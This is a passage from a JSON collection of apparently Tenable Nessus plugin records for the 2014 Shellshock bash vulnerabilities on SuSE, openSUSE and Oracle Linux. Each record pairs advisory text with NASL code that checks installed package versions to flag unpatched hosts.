"bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:suse_linux:11:bash", "p-cpe:/a:novell:suse_linux:11:bash-doc", "p-cpe:/a:novell:suse_linux:11:libreadline5", "p-cpe:/a:novell:suse_linux:11:libreadline5-32bit", "p-cpe:/a:novell:suse_linux:11:readline-doc", "cpe:/o:novell:suse_linux:11"], "id": "SUSE_11_BASH-140926.NASL", "href": "https://www.tenable.com/plugins/nessus/77958", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from SuSE 11 update information. The text itself is\n# copyright (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77958);\n script_version(\"1.14\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"SuSE 11.3 Security Update : bash (SAT Patch Number 9780)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote SuSE 11 host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"The command-line shell 'bash' evaluates environment variables, which\nallows the injection of characters and might be used to access files\non the system in some circumstances. (CVE-2014-7169)\n\nPlease note that this issue is different from a previously fixed\nvulnerability tracked under CVE-2014-6271 and is less serious due to\nthe special, non-default system configuration that is needed to create\nan exploitable situation.\n\nTo remove further exploitation potential we now limit the\nfunction-in-environment variable to variables prefixed with\nBASH_FUNC_. This hardening feature is work in progress and might be\nimproved in later updates.\n\nAdditionally, two other security issues have been fixed :\n\n - Nested HERE documents could lead to a crash of bash.\n (CVE-2014-7186)\n\n - Nesting of for loops could lead to a crash of bash.\n (CVE-2014-7187)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898346\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898603\");\n script_set_attribute(attribute:\"see_also\", value:\"https://bugzilla.novell.com/show_bug.cgi?id=898604\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-6271.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-7169.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-7186.html\");\n script_set_attribute(attribute:\"see_also\", value:\"http://support.novell.com/security/cve/CVE-2014-7187.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply SAT patch number 9780.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection (Shellshock)');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libreadline5\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:libreadline5-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:readline-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"SuSE Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2022 Tenable Network Security, Inc.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 3) audit(AUDIT_OS_NOT, \"SuSE 11.3\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"bash-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"bash-doc-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"libreadline5-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"i586\", reference:\"readline-doc-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"bash-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"bash-doc-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:3, cpu:\"x86_64\", reference:\"readline-doc-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"bash-doc-3.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"libreadline5-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, reference:\"readline-doc-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"s390x\", reference:\"libreadline5-32bit-5.2-147.22.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:3, cpu:\"x86_64\", reference:\"libreadline5-32bit-5.2-147.22.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-06-02T14:14:10", "description": "This patch was withdrawn by the openSUSE team, as the software was fixed prior to release. No replacement patches/plugins exist.\n\nbash was updated to fix command injection via environment variables.\n(CVE-2014-6271,CVE-2014-7169)\n\nAlso a hardening patch was applied that only imports functions over BASH_FUNC_ prefixed environment variables.\n\nAlso fixed: CVE-2014-7186, CVE-2014-7187: bad handling of HERE documents and for loop issue", "cvss3": {}, "published": "2014-10-10T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1254-1) (deprecated)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2021-01-19T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:13.2"], "id": "OPENSUSE-2014-567.NASL", "href": "https://www.tenable.com/plugins/nessus/78115", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-567.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\n# @DEPRECATED@\n#\n# This script has been deprecated as it has been determined that the\n# advisory was withdrawn and fixed prior to release of openSUSE 13.2.\n#\n# Disabled on 2015/11/02.\n#\n\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(78115);\n script_version(\"1.12\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2014-6271\", \"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1254-1) (deprecated)\");\n script_summary(english:\"Check for the openSUSE-2014-567 patch\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"This plugin has been deprecated.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"This patch was withdrawn by the openSUSE team, as the software was\nfixed prior to release. No replacement patches/plugins exist.\n\nbash was updated to fix command injection via environment variables.\n(CVE-2014-6271,CVE-2014-7169)\n\nAlso a hardening patch was applied that only imports functions over\nBASH_FUNC_ prefixed environment variables.\n\nAlso fixed: CVE-2014-7186, CVE-2014-7187: bad handling of HERE\ndocuments and for loop issue\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://lists.opensuse.org/opensuse-updates/2014-09/msg00063.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=895475\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=896776\"\n );\n script_set_attribute(attribute:\"solution\", value:\"n/a\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Apache mod_cgi Bash Environment Variable Code Injection');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\nscript_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-debugsource\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-lang\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:bash-loadables-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:opensuse:readline-devel-32bit\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:opensuse:13.2\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/29\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/10/10\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2014-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\", \"Host/cpu\");\n\n exit(0);\n}\n\n# Deprecated.\nexit(0, \"The advisory was withdrawn by the vendor as the patch is not needed.\");\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release =~ \"^(SLED|SLES)\") audit(AUDIT_OS_NOT, \"openSUSE\");\nif (release !~ \"^(SUSE13\\.2)$\") audit(AUDIT_OS_RELEASE_NOT, \"openSUSE\", \"13.2\", release);\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\nourarch = get_kb_item(\"Host/cpu\");\nif (!ourarch) audit(AUDIT_UNKNOWN_ARCH);\nif (ourarch !~ \"^(i586|i686|x86_64)$\") audit(AUDIT_ARCH_NOT, \"i586 / i686 / x86_64\", ourarch);\n\nflag = 0;\n\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-debuginfo-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-debugsource-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-devel-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-lang-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-loadables-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"bash-loadables-debuginfo-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libreadline6-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"libreadline6-debuginfo-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", reference:\"readline-devel-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"bash-debuginfo-32bit-4.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libreadline6-32bit-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"libreadline6-debuginfo-32bit-6.2-75.4.1\") ) flag++;\nif ( rpm_check(release:\"SUSE13.2\", cpu:\"x86_64\", reference:\"readline-devel-32bit-6.2-75.4.1\") ) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-18T14:23:32", "description": "From Red Hat Security Advisory 2014:1306 :\n\n[Updated September 30, 2014] This advisory has been updated with information on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available for Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important security impact. A Common Vulnerability Scoring System (CVSS) base score, which gives a detailed severity rating, is available from the CVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language interpreter compatible with the Bourne shell (sh). Bash is the default shell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash still allowed certain characters to be injected into other environments via specially crafted environment variables. An attacker could potentially use this flaw to override or bypass environment restrictions to execute shell commands. Certain services and applications allow remote unauthenticated attackers to provide environment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment variables need to be made aware of changes to the way names are handled by this update. Note that certain services, screen sessions, and tmux sessions may need to be restarted, and affected interactive users may need to re-login. Installing these updated packages without restarting services will address the vulnerability, but functionality may be impacted until affected services are restarted. For more information see the Knowledgebase article at https://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their containers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer to the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which contain a backported patch to correct this issue.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "Oracle Linux 5 / 6 / 7 : bash (ELSA-2014-1306)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2023-04-25T00:00:00", "cpe": ["p-cpe:/a:oracle:linux:bash", "p-cpe:/a:oracle:linux:bash-doc", "cpe:/o:oracle:linux:5", "cpe:/o:oracle:linux:6", "cpe:/o:oracle:linux:7"], "id": "ORACLELINUX_ELSA-2014-1306.NASL", "href": "https://www.tenable.com/plugins/nessus/77951", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from Red Hat Security Advisory RHSA-2014:1306 and \n# Oracle Linux Security Advisory ELSA-2014-1306 respectively.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77951);\n script_version(\"1.35\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2023/04/25\");\n\n script_cve_id(\"CVE-2014-7169\", \"CVE-2014-7186\", \"CVE-2014-7187\");\n script_bugtraq_id(70137, 70152, 70154);\n script_xref(name:\"RHSA\", value:\"2014:1306\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n\n script_name(english:\"Oracle Linux 5 / 6 / 7 : bash (ELSA-2014-1306)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Oracle Linux host is missing one or more security updates.\");\n script_set_attribute(attribute:\"description\", value:\n\"From Red Hat Security Advisory 2014:1306 :\n\n[Updated September 30, 2014] This advisory has been updated with\ninformation on restarting system services after applying this update.\nNo changes have been made to the original packages.\n\nUpdated bash packages that fix one security issue are now available\nfor Red Hat Enterprise Linux 5, 6, and 7.\n\nRed Hat Product Security has rated this update as having Important\nsecurity impact. A Common Vulnerability Scoring System (CVSS) base\nscore, which gives a detailed severity rating, is available from the\nCVE link in the References section.\n\nThe GNU Bourne Again shell (Bash) is a shell and command language\ninterpreter compatible with the Bourne shell (sh). Bash is the default\nshell for Red Hat Enterprise Linux.\n\nIt was found that the fix for CVE-2014-6271 was incomplete, and Bash\nstill allowed certain characters to be injected into other\nenvironments via specially crafted environment variables. An attacker\ncould potentially use this flaw to override or bypass environment\nrestrictions to execute shell commands. Certain services and\napplications allow remote unauthenticated attackers to provide\nenvironment variables, allowing them to exploit this issue.\n(CVE-2014-7169)\n\nApplications which directly create bash functions as environment\nvariables need to be made aware of changes to the way names are\nhandled by this update. Note that certain services, screen sessions,\nand tmux sessions may need to be restarted, and affected interactive\nusers may need to re-login. Installing these updated packages without\nrestarting services will address the vulnerability, but functionality\nmay be impacted until affected services are restarted. For more\ninformation see the Knowledgebase article at\nhttps://access.redhat.com/articles/1200223\n\nNote: Docker users are advised to use 'yum update' within their\ncontainers, and to commit the resulting changes.\n\nFor additional information on CVE-2014-6271 and CVE-2014-7169, refer\nto the aforementioned Knowledgebase article.\n\nAll bash users are advised to upgrade to these updated packages, which\ncontain a backported patch to correct this issue.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004484.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004485.html\");\n script_set_attribute(attribute:\"see_also\", value:\"https://oss.oracle.com/pipermail/el-errata/2014-September/004486.html\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected bash packages.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:F/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2014-7187\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2014/09/24\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2014/09/26\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2014/09/29\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:oracle:linux:bash-doc\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:5\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:6\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:oracle:linux:7\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Oracle Linux Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2014-2023 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/OracleLinux\", \"Host/RedHat/release\", \"Host/RedHat/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/OracleLinux\")) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nrelease = get_kb_item(\"Host/RedHat/release\");\nif (isnull(release) || !pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux)\", string:release)) audit(AUDIT_OS_NOT, \"Oracle Linux\");\nos_ver = pregmatch(pattern: \"Oracle (?:Linux Server|Enterprise Linux) .*release ([0-9]+(\\.[0-9]+)?)\", string:release);\nif (isnull(os_ver)) audit(AUDIT_UNKNOWN_APP_VER, \"Oracle Linux\");\nos_ver = os_ver[1];\nif (! preg(pattern:\"^(5|6|7)([^0-9]|$)\", string:os_ver)) audit(AUDIT_OS_NOT, \"Oracle Linux 5 / 6 / 7\", \"Oracle Linux \" + os_ver);\n\nif (!get_kb_item(\"Host/RedHat/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && \"ia64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"Oracle Linux\", cpu);\n\nflag = 0;\nif (rpm_check(release:\"EL5\", reference:\"bash-3.2-33.el5_11.4\")) flag++;\n\nif (rpm_check(release:\"EL6\", reference:\"bash-4.1.2-15.el6_5.2\")) flag++;\nif (rpm_check(release:\"EL6\", reference:\"bash-doc-4.1.2-15.el6_5.2\")) flag++;\n\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-4.2.45-5.el7_0.4\")) flag++;\nif (rpm_check(release:\"EL7\", cpu:\"x86_64\", reference:\"bash-doc-4.2.45-5.el7_0.4\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"bash / bash-doc\");\n}\n", "cvss": {"score": 0.0, "vector": "NONE"}}, {"lastseen": "2023-05-28T14:22:09", "description": "The command-line shell 'bash' evaluates environment variables, which allows the injection of characters and might be used to access files on the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed vulnerability tracked under CVE-2014-6271 and it is less serious due to the special, non-default system configuration that is needed to create an exploitable situation.\n\nTo remove further exploitation potential we now limit the function-in-environment variable to variables prefixed with BASH_FUNC_ . This hardening feature is work in progress and might be improved in later updates.\n\nAdditionaly two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of bash.", "cvss3": {}, "published": "2014-09-29T00:00:00", "type": "nessus", "title": "openSUSE Security Update : bash (openSUSE-SU-2014:1242-1) (Shellshock)", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2014-6271", "CVE-2014-7169", "CVE-2014-7186", "CVE-2014-7187"], "modified": "2022-12-05T00:00:00", "cpe": ["p-cpe:/a:novell:opensuse:bash", "p-cpe:/a:novell:opensuse:bash-debuginfo", "p-cpe:/a:novell:opensuse:bash-debuginfo-32bit", "p-cpe:/a:novell:opensuse:bash-debugsource", "p-cpe:/a:novell:opensuse:bash-devel", "p-cpe:/a:novell:opensuse:bash-lang", "p-cpe:/a:novell:opensuse:bash-loadables", "p-cpe:/a:novell:opensuse:bash-loadables-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6", "p-cpe:/a:novell:opensuse:libreadline6-32bit", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo", "p-cpe:/a:novell:opensuse:libreadline6-debuginfo-32bit", "p-cpe:/a:novell:opensuse:readline-devel", "p-cpe:/a:novell:opensuse:readline-devel-32bit", "cpe:/o:novell:opensuse:13.1"], "id": "OPENSUSE-2014-564.NASL", "href": "https://www.tenable.com/plugins/nessus/77967", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were\n# extracted from openSUSE Security Update openSUSE-2014-564.\n#\n# The text description of this plugin is (C) SUSE LLC.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(77967);\n script_version(\"1.21\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/12/05\");\n\n script_cve_id(\n \"CVE-2014-6271\",\n \"CVE-2014-7169\",\n \"CVE-2014-7186\",\n \"CVE-2014-7187\"\n );\n script_xref(name:\"IAVA\", value:\"2014-A-0142\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/07/28\");\n script_xref(name:\"CEA-ID\", value:\"CEA-2019-0240\");\n\n script_name(english:\"openSUSE Security Update : bash (openSUSE-SU-2014:1242-1) (Shellshock)\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote openSUSE host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"The command-line shell 'bash' evaluates environment variables, which\nallows the injection of characters and might be used to access files\non the system in some circumstances (CVE-2014-7169).\n\nPlease note that this issue is different from a previously fixed\nvulnerability tracked under CVE-2014-6271 and it is less serious due\nto the special, non-default system configuration that is needed to\ncreate an exploitable situation.\n\nTo remove further exploitation potential we now limit the\nfunction-in-environment variable to variables prefixed with BASH_FUNC_\n. This hardening feature is work in progress and might be improved in\nlater updates.\n\nAdditionaly two more security issues were fixed in bash:\nCVE-2014-7186: Nested HERE documents could lead to a crash of bash.\n\nCVE-2014-7187: Nesting of for loops could lead to a crash of 